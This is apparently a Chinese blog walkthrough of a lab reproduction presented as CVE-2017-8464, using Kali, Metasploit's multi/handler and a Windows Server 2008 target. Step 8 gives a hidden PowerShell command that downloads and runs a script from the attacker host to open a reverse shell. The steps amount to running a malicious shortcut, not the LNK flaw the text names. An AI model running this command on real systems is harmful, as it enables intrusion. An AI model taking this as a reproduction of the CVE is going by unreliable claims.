漏洞介绍:Microsoft Windows 中有一个远程代码执行漏洞,允许在经特殊设计快捷方式图标显示时允许发生远程代码执行。成功利用此漏洞的攻击者可能会获得与本地用户相同的用户权限。
运用Metasploit对目标主机所存在的漏洞进行利用。选用multi/handler监听模块,利用后可获取shell。
下面是利用过程:
首先我们要准备好CVE-2017-8464的复现环境,kali虚拟机和windows server2008。
攻击机:kali IP:192.168.137.133
靶机:windows server2008 IP:192.168.137.132
1.打开kali终端,生成一个powershell文件
2.然后将生成的文件移动至/var/www/html目录下
3.开启apache服务
4.在网页尝试访问一下
5.访问没有问题,我们启动MSF,使用监听模块multi/handler,并配置好对应选项
6.然后开始监听
7.然后我们切换到windows server2008,创建一个快捷方式
8.我们在这里输入构造好的路径代码:
powershell -windowstyle hidden -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://192.168.137.133/1.ps1');test.ps1"
9.点击下一步,然后点击完成,生成的就是一个powershell快捷方式
10.我们双击运行一下快捷方式,因为这个快捷方式秒退,无法截图,所以这里
就不贴图了,双击大家都会。然后我们切回kali虚拟机,发现已经反弹到了shell
11.我们输入常用命令试试
攻击成功!
这个漏洞非常简单,但是命令容易输错,大家复现的时候一定要注意。
领取专属 10元无门槛券
私享最新 技术干货